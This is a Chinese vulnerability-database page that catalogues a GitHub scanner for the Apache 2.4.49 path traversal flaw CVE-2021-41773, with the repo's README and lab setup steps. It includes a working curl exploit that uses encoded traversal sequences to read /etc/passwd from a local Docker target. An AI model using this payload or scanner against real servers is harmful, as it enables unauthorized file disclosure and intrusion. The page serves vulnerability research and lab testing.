漏洞平台

POC详情： 59f496b5f93e2e67b2a39e2f079ca37f629426d6

来源

https://github.com/vida003/Scanner-CVE-2021-41773

关联漏洞

标题： Apache HTTP Server 路径遍历漏洞 (CVE-2021-41773)
描述：Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 2.4.49版本存在路径遍历漏洞，攻击者可利用该漏洞使用路径遍历攻击将URL映射到预期文档根以外的文件。

描述

A automatic scanner to apache 2.4.49

介绍

# Scanner-CVE-2021-41773
### A automatic scanner to apache 2.4.49
<pre>
• run: go run main.go  OR  go build main.go && ./main
• you can customize your payload
• vulnerable hosts are saved
</pre><hr>

![image](https://user-images.githubusercontent.com/77762068/138774460-4fe76efc-7f43-4a32-b870-8092f987daa8.png)

<pre>
Make your lab:
1. Pull Image: sudo docker pull blueteamsteve/cve-2021-41773:no-cgid
2. Run Image: sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
3. Exploit: curl -v "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"
</pre>

文件快照


 [4.0K]  /data/pocs/59f496b5f93e2e67b2a39e2f079ca37f629426d6
├── [2.3K]  main.go
└── [ 582]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。